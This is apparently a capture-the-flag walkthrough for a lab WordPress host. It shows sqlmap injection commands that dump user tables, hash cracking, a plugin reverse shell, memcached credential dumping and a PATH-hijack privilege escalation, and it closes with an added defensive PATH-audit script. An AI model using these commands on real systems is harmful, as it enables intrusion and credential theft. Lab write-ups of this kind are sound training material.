rustscan
    rustscan -a 10.10.140.46
Open 10.10.140.46:22
Open 10.10.140.46:80
robots.txt
    User-agent: *
http://10.10.140.46/comingreallysoon/

So we found this website.
http://10.10.140.46/it-next/
Gobuster
    gobuster dir -u http://10.10.140.46/it-next/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

SQL injection
List of dbs
    sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" --dbs

List of tables
    sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress --tables

Dump the table wp_users
    sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress -T wp_users --dump

Let’s put those hashes into a file and crack them.
    $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
    john hashs --wordlist=/home/peanutstick/Documents/arch_doc/CTF/Wordlist/rockyou.txt

Log in with wp_yura:soccer13
WordPress
http://site.wekor.thm/wordpress/
You need to add it to your /etc/hosts.

Reverse shell
With the plugin.

Then zip it:
    zip rev.zip revershell.php
Upgrade the shell
    python3 -c 'import pty;pty.spawn("/bin/bash")'
Then Ctrl + Z.
    stty raw -echo; fg # allow auto completion
Privesc

There is the tool memcached-tool in /usr/share/memcached/scripts.
We can dump what’s running on port 11211.
    /usr/share/memcached/scripts/memcached-tool localhost:11211 dump
Output.
    Dumping bucket 1 - 5 total items
With the password OrkAiSC00L24/7$

Privesc to root
    sudo -l

Let’s dig into this binary.
    strings /home/Orka/Desktop/bitcoin

It uses python.
    Orka@osboxes:~$ ls /usr/sbin/python
Let’s create it.
    export PATH="/usr/sbin:$PATH"

I’m root.
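
Added example, not part of the original write-up: the root step above relies on being able to create a python in a directory that is searched before the real interpreter. The POSIX shell function below audits a search path for that condition. path_shadow_audit, make_demo_layout and the temporary layout are names and data constructed for illustration; on a real host, pass the path the privileged command actually uses (for sudo, its secure_path setting).

```shell
#!/bin/sh
# Added example (not from the write-up): audit a command search path.
# path_shadow_audit CMD [PATH_STRING]   (PATH_STRING defaults to $PATH)
#   WRITABLE <dir>   directory searched for CMD that is group/other-writable
#                    or writable by the current non-root user
#   RESOLVES <file>  first place CMD is found; NOTFOUND if it is nowhere
# Exit status is 1 if any WRITABLE line was printed, otherwise 0.
path_shadow_audit() (
    cmd=$1; search=${2:-$PATH}; status=0
    IFS=:; set -f                    # split on ':' only, no globbing
    for dir in $search; do
        [ -n "$dir" ] || dir=.       # an empty PATH entry means the current directory
        [ -d "$dir" ] || continue
        case $(ls -ldL -- "$dir") in # -L: judge the target of a symlinked directory
            ?????w*|????????w*)      # 6th/9th mode character = group/other write
                echo "WRITABLE $dir (group/other write bit)"; status=1 ;;
            *)  if [ "$(id -u)" -ne 0 ] && [ -w "$dir" ]; then
                    echo "WRITABLE $dir (writable by current user)"; status=1
                fi ;;
        esac
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            echo "RESOLVES $dir/$cmd"; exit "$status"
        fi
    done
    echo "NOTFOUND $cmd"; exit "$status"
)

# Constructed layout for the demo: a world-writable "sbin" searched before the
# "bin" that holds the interpreter (a stand-in file, not a real python).
make_demo_layout() {
    root=$(mktemp -d) && mkdir "$root/sbin" "$root/bin" || return 1
    printf '#!/bin/sh\n' > "$root/bin/python"
    chmod 755 "$root/bin/python"; chmod 777 "$root/sbin"; chmod 555 "$root/bin"
    echo "$root"
}

demo=$(make_demo_layout)
path_shadow_audit python "$demo/sbin:$demo/bin" || true
chmod -R u+w "$demo" && rm -rf "$demo"
```

Any WRITABLE line printed before the RESOLVES line marks a directory where a file named like the command would be picked up first; tightening that directory's permissions or calling the interpreter by absolute path removes the condition.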

Other solution for privesc.

